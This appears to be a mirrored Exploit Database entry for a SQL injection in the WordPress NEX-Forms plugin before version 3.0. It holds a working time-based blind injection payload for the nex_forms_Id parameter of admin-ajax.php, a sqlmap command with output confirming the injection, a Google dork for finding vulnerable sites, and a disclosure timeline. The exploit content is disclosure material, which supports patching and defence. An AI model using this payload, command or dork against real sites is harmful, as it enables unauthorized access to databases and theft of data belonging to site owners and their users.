WordPress Plugin NEX-Forms < 3.0 - SQL Injection

• Exploit Database
• 114 阅读

• 作者： Claudio Viviani
  日期： 2015-04-21
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/36800/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89

  ######################   # Exploit Title : NEX-Forms 3.0 SQL Injection Vulnerability   # Exploit Author : Claudio Viviani   # Website Author: http://www.homelab.it http://archive-exploit.homelab.it/1 (Full HomelabIT Vulns Archive)     # Vendor Homepage : https://wordpress.org/plugins/nex-forms-express-wp-form-builder/   # Software Link : https://downloads.wordpress.org/plugin/nex-forms-express-wp-form-builder.3.0.zip   # Dork Google: inurl:nex-forms-express-wp-form-builder #index of nex-forms-express-wp-form-builder   # Date : 2015-03-29   # Tested on : Windows 7 / Mozilla Firefox # Linux / Mozilla Firefox   ######################   # Info:   The "submit_nex_form" ajax function is affected from SQL Injection vulnerability "nex_forms_Id" var is not sanitized   # PoC Exploit:   http://TARGET/wordpress/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=10 AND (SELECT * FROM (SELECT(SLEEP(10)))NdbE)   # Poc Video:   http://youtu.be/04G08Cbrx1I   # PoC sqlmap:   sqlmap -u "http://TARGET/wordpress/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=10" -p nex_forms_Id --dbms mysql [23:15:37] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' [23:15:48] [INFO] GET parameter 'nex_forms_Id' seems to be 'MySQL >= 5.0.12 AND time-based blind (SELECT)' injectable for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] [23:15:55] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns' [23:15:55] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found [23:16:01] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns' [23:16:07] [INFO] checking if the injection point on GET parameter 'nex_forms_Id' is a false positive GET parameter 'nex_forms_Id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] sqlmap identified the following injection points with a total of 85 HTTP(s) requests: --- Parameter: nex_forms_Id (GET) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: action=submit_nex_form&nex_forms_Id=10 AND (SELECT * FROM (SELECT(SLEEP(5)))NdbE) --- [23:16:34] [INFO] the back-end DBMS is MySQL web server operating system: Linux CentOS 5.10 web application technology: PHP 5.3.3, Apache 2.2.3 back-end DBMS: MySQL 5.0.12   ######################   # Vulnerability Disclosure Timeline:   2015-03-29:Discovered vulnerability 2015-04-16:Vendor Notification 2015-04-17:Vendor Response/Feedback 2015-04-21:Vendor Send Fix/Patch (same version number) 2015-04-21:Public Disclosure   #####################   Discovered By : Claudio Viviani http://www.homelab.it http://archive-exploit.homelab.it/1 (Full HomelabIT Vulns Archive) http://ffhd.homelab.it (Free Fuzzy Hashes Database) info@homelab.it homelabit@protonmail.ch   https://www.facebook.com/homelabit https://twitter.com/homelabit https://plus.google.com/+HomelabIt1/ https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww   #####################